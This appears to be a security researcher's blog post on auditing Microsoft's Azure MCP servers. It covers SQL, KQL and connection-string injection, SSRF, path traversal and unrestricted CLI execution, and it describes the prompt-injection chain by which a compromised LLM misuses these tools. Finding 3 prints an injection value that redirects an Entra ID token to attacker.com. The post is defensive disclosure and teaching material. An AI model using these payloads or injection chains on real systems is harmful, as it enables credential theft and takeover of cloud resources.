Microsoft ships three open-source MCP (Model Context Protocol) servers for Azure integration. Combined: 5,400+ GitHub stars, used by developers connecting AI agents to Azure infrastructure.
I audited all three. I found 20+ vulnerabilities across 6 vulnerability classes, including a CVSS 9.8 SQL injection and 7 unpatched variants of a CVE that Microsoft already fixed once.
Every finding has been reported to MSRC. This post covers the patterns and methodology — not exploitation steps. If you maintain MCP servers, the patterns here apply to your code too.
The Targets
| Repository | Language | Stars | Purpose |
|---|---|---|---|
| Azure/azure-mcp | C# | 1,206 | Azure resource management via MCP |
| microsoft/mcp | C# | 2,781 | Microsoft's broader MCP tools |
| microsoft/azure-devops-mcp | TypeScript | 1,411 | Azure DevOps pipelines, repos, work items |
These aren't toy projects. They connect LLMs to production Azure resources — databases, key vaults, storage accounts, VMs, DevOps pipelines. The blast radius of a vulnerability here is your entire Azure tenant.
Why MCP Is a New Attack Surface
Traditional tools have a human in the loop. MCP tools have an LLM in the loop.
The difference matters. An LLM processes untrusted data (documents, web pages, code, database records) and decides which tools to call with which parameters. If an attacker can influence that data — and they usually can — they control the tool inputs.
This is the prompt injection → tool misuse chain:
- Attacker plants malicious instructions in data the LLM will process
- The LLM, following the injected instructions, calls an MCP tool with attacker-controlled parameters
- The MCP server executes the operation with its configured credentials (often Azure managed identity)
- The attacker achieves data exfiltration, destruction, or lateral movement
Every vulnerability below follows this chain. The MCP server is the last line of defense — and in most cases, it had no defenses at all.
Finding 1: SQL Injection in PostgreSQL — But Not MySQL (CVSS 9.8)
This is the finding that tells you the most about how MCP security bugs happen.
The Azure MCP Server has two database services: MySQL and PostgreSQL. Same codebase. Same team. Same architecture. But the MySQL service has a ValidateQuerySafety() method that blocks destructive operations and enforces read-only queries.
The PostgreSQL service has none of that. User-supplied queries go straight to NpgsqlCommand.ExecuteReaderAsync() with zero validation.
Here's the pattern in the Postgres service (simplified):
public async Task<List<string>> ExecuteQueryAsync(
string subscriptionId, string resourceGroup,
string user, string server, string database,
string query, CancellationToken cancellationToken)
{
// ... connection setup ...
await using var command = new NpgsqlCommand(query, resource.Connection);
await using var reader = await command.ExecuteReaderAsync();
// ...
}
And the table schema method uses string interpolation for the table name:
var query = $"SELECT column_name, data_type FROM information_schema.columns " +
$"WHERE table_name = '{table}';";
Classic SQL injection. The table parameter comes directly from LLM tool input.
Meanwhile, the MySQL service (same repo, same Services/ directory) has keyword blocking, destructive operation detection, and read-only enforcement. Someone built the validation for MySQL, and either forgot to port it to Postgres, or Postgres was added later without the same review.
The audit lesson: When you find validation in one service, immediately check if sibling services have the same validation. Inconsistency between parallel implementations is one of the highest-signal patterns for finding vulnerabilities.
Finding 2: 7 Unpatched SSRF Variants of CVE-2026-26118
CVE-2026-26118 was disclosed and patched on March 10, 2026. It was an SSRF in the Azure MCP Server — user-controlled parameters constructed URLs that got Azure managed identity Bearer tokens attached.
The patch fixed the specific service that was reported. But the same pattern exists in at least 7 more services in the same codebase, all unpatched.
The pattern is simple: take a user-supplied name (account name, vault name, cluster URI, service name), interpolate it into a URL template, and make an authenticated request to that URL.
Each Azure service has a well-known URL format. For example:
- Storage:
https://{account}.blob.core.windows.net - KeyVault:
https://{vaultName}.vault.azure.net - Cosmos DB:
https://{accountName}.documents.azure.com - Search:
https://{serviceName}.search.windows.net
None of these validate that the input actually matches the expected format. Azure storage account names are 3-24 lowercase alphanumeric characters — but the code accepts any string.
The services where I confirmed this pattern was unpatched:
- Storage — account name parameter
- KeyVault — vault name parameter
- Cosmos DB — account name parameter
- Kusto — cluster URI parameter (accepts full URLs)
- Search — service name parameter
- Foundry — endpoint parameter (full URL, no validation)
- Monitor — workspace-related parameters
In every case, the server attaches Azure credentials (managed identity tokens or service principal tokens) to the outgoing request. An attacker-controlled URL receives those tokens.
The audit lesson: When a CVE patch fixes one instance of a pattern, search the entire codebase for the same pattern. grep for the URL construction method, the authentication attachment method, or the parameter name pattern. One CVE patch often means N-1 remaining instances.
Finding 3: Connection String Injection Stealing Entra ID Tokens (CVSS 8.1)
The database services construct connection strings by interpolating parameters:
var connectionString = $"Host={host};Database={database};Username={user};" +
$"Password={entraIdAccessToken}";
The database parameter comes from the LLM. Connection string parsers process parameters sequentially — later values override earlier ones.
If an attacker sets database to postgres;Host=attacker.com;SslMode=Disable, the resulting connection string becomes:
Host=legitimate.server;Database=postgres;Host=attacker.com;SslMode=Disable;
Username=user;Password=eyJ0eXAiOiJKV1Q...
The second Host= overrides the first. The Entra ID access token — a full JWT that provides access to Azure resources — is sent as the password to the attacker's server.
This works in both Npgsql (PostgreSQL) and MySQL Connector/NET. The NormalizeServerName() function in the code only validates the server parameter, not the database parameter. Even if you lock down server name validation, the injection through database bypasses it entirely.
The audit lesson: Any time user input is concatenated into a structured string format (connection strings, URLs, headers, command arguments), check whether delimiter injection can override earlier values. This class of vulnerability — parameter pollution — is older than SQL injection, and it still shows up everywhere.
Finding 4: Unrestricted Azure CLI Execution (CVSS 9.1)
The AzCommand tool accepts an arbitrary Azure CLI command string and passes it directly to az CLI execution:
var command = options.Command;
// No validation, no allowlist, no blocklist
var result = await _processService.ExecuteAsync(azPath, command, ...);
No allowlist. No blocklist. No category restrictions. The tool description tells the LLM to "ALWAYS request user confirmation" — but that confirmation is enforced by the LLM, not by code. A prompt-injected LLM skips the confirmation.
With this tool, an attacker who achieves prompt injection can execute any az CLI command with the configured service principal credentials. That includes commands that delete resource groups, create backdoor service principals, exfiltrate Key Vault secrets, or run arbitrary scripts on virtual machines.
The tool also embeds the service principal clientSecret in process command-line arguments during login, making it visible in process listings.
The audit lesson: "The LLM will ask for confirmation" is not a security control. In the MCP threat model, the LLM is compromised (via prompt injection). Every security check must happen in the MCP server code, not in the LLM's judgment.
Finding 5: Arbitrary File Write via Path Traversal (CVSS 8.1)
The Azure DevOps MCP Server's pipelines_download_artifact tool accepts a destinationPath parameter:
if (destinationPath) {
const fullDestinationPath = resolve(destinationPath);
mkdirSync(fullDestinationPath, { recursive: true });
const fileDestinationPath = join(fullDestinationPath, `${artifactName}.zip`);
const writeStream = createWriteStream(fileDestinationPath);
fileStream.pipe(writeStream);
}
resolve() normalizes the path but does not restrict it. mkdirSync with recursive: true creates any directory tree. createWriteStream writes to any path.
Both destinationPath and artifactName come from tool parameters (LLM-controlled). An attacker can write files to SSH directories, cron directories, shell profiles, or any other location the MCP server process can access.
The audit lesson: In MCP servers, every tool parameter is attacker-controlled. Path parameters need allowlist-based validation (explicit allowed directories), not just normalization. resolve() and path.join() are not security functions.
Finding 6: KQL Command Injection (CVSS 7.5)
The Kusto service interpolates table names directly into KQL control commands:
var kustoResult = await kustoClient.ExecuteQueryCommandAsync(
databaseName,
$".show table {tableName} cslschema", cancellationToken);
And into queries:
var query = $"{options.Table} | sample {options.Limit}";
An attacker-controlled table name can inject KQL operators to exfiltrate data from arbitrary tables, cross-database, with column selection. No escaping functions exist anywhere in the Kusto service code.
The audit lesson: If a service builds queries via string concatenation, check every interpolated parameter. This applies to SQL, KQL, GraphQL, LDAP, shell commands — any query language.
The Methodology: How to Audit MCP Servers
Here's the systematic approach I used. It works on any MCP server.
Step 1: Map the Attack Surface
Every MCP tool definition is a potential entry point. List every tool, every parameter, and every parameter type. Focus on:
- String parameters — unbounded input, highest injection risk
- Path parameters — traversal risk
- URL/hostname parameters — SSRF risk
- Query/command parameters — injection risk
Step 2: Trace Data Flow
For each parameter, trace it from the tool handler to where it's used. You're looking for:
- Direct use in queries (SQL, KQL, GraphQL, etc.)
- String interpolation into URLs or connection strings
- File system operations (read, write, mkdir, delete)
- Process execution (exec, spawn, system calls)
- Serialization/deserialization (pickle, YAML, XML)
Step 3: Check for Validation Asymmetry
This was the highest-yield technique in this audit. When you find validation in one place, check if all parallel code paths have the same validation. The PostgreSQL/MySQL inconsistency and the SSRF patch that only fixed one service both came from this check.
Step 4: Audit the Trust Model
Who does the code trust? In these servers:
- LLM input was trusted (it shouldn't be — prompt injection makes it attacker-controlled)
- Tool descriptions relied on LLM behavior for security ("always ask for confirmation")
- Credentials were attached to requests built from user input
If security depends on the LLM behaving correctly, it's not security.
Step 5: Check the CVE History
Search for CVEs in the project. Read each patch. Then search for the same pattern elsewhere in the codebase. A patched CVE is a roadmap to unpatched variants.
The Bigger Picture
MCP adoption is accelerating. Every major AI coding tool supports it. Developers are connecting LLMs to production infrastructure — databases, cloud APIs, CI/CD pipelines, file systems — through MCP servers.
The security model hasn't caught up. Most MCP servers treat tool inputs as trusted, but in the real threat model, every input is potentially attacker-controlled via prompt injection. We need:
- Input validation at the MCP server layer — not in the LLM
- Least-privilege tool design — read-only by default, destructive actions behind real authorization (not LLM confirmation)
- Output sanitization — tool responses flow back into the LLM context, creating secondary injection vectors
-
Allowlist-based parameter validation — account names should match
^[a-z0-9]{3,24}$, paths should be under an allowed root, commands should be from an approved list
Every MCP server with more than 100 stars is worth auditing. The patterns above will appear in most of them.
Tools
These are the open-source tools I use and maintain for MCP and AI security research:
- ai-injection-guard — Prompt injection detection with 75+ patterns and output scanning. Protect LLM inputs and outputs.
- mcp-security-audit — Connect to any MCP server, enumerate tools, classify risks, scan for injection patterns, produce a scored report.
- agent-safety-mcp — MCP server that ties input validation, decision tracing, and cost controls together for AI agents.
All available on PyPI and GitHub.
Follow @gmanjuu for more AI security research. If you find something, report it responsibly — then write about the patterns.
Top comments (0)